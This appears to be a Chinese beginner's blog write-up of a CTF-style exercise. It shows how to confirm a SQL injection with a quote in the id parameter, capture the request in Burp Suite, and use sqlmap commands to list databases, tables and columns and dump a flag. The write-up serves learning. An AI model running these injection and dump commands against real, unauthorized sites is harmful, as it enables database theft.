使用sqlmap + burpsuite sql工具注入拿flag

使用sqlmap + burpsuite sql工具注入拿flag

记录一下自己重新开始学习web安全之路③。
目标网站:http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/

首先判断网站是否存在SQL注入漏洞

1.找交互点

发现只有url这一个交互点,搜索框和登录框都没有。

2.找注入点

1

在唯一的交互点url中输入?id=2‘

2

发现回显不正常,说明该url是一个注入点

打开burpsuite 的抓包功能,在url中输入?id=2’,开始抓包。

3

使用sqlmap工具。

1.查看数据库名称(message)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” --current-db

–current-db //列出当前所有数据库名称

db // datebase

4

2.查看数据表名称(flag)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message --tables

-D //指定数据库名称

–tables // 列出所有的数据表

5

3.查看数据列名称(flag)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag --columns

-D //指定数据库名称

-T // 指定数据表名称

–columns // 列出所有的列

6

4.查看数据

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag -C flag --dump

-D //指定数据库名称

-T // 指定数据表名称

-C // 指定数据列名称

–dump // 读取数据

7

MD5解密

8

遇到的问题

抓到的包必须是注入点的包,不然用sqlmap的时候,会报错。

9

  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值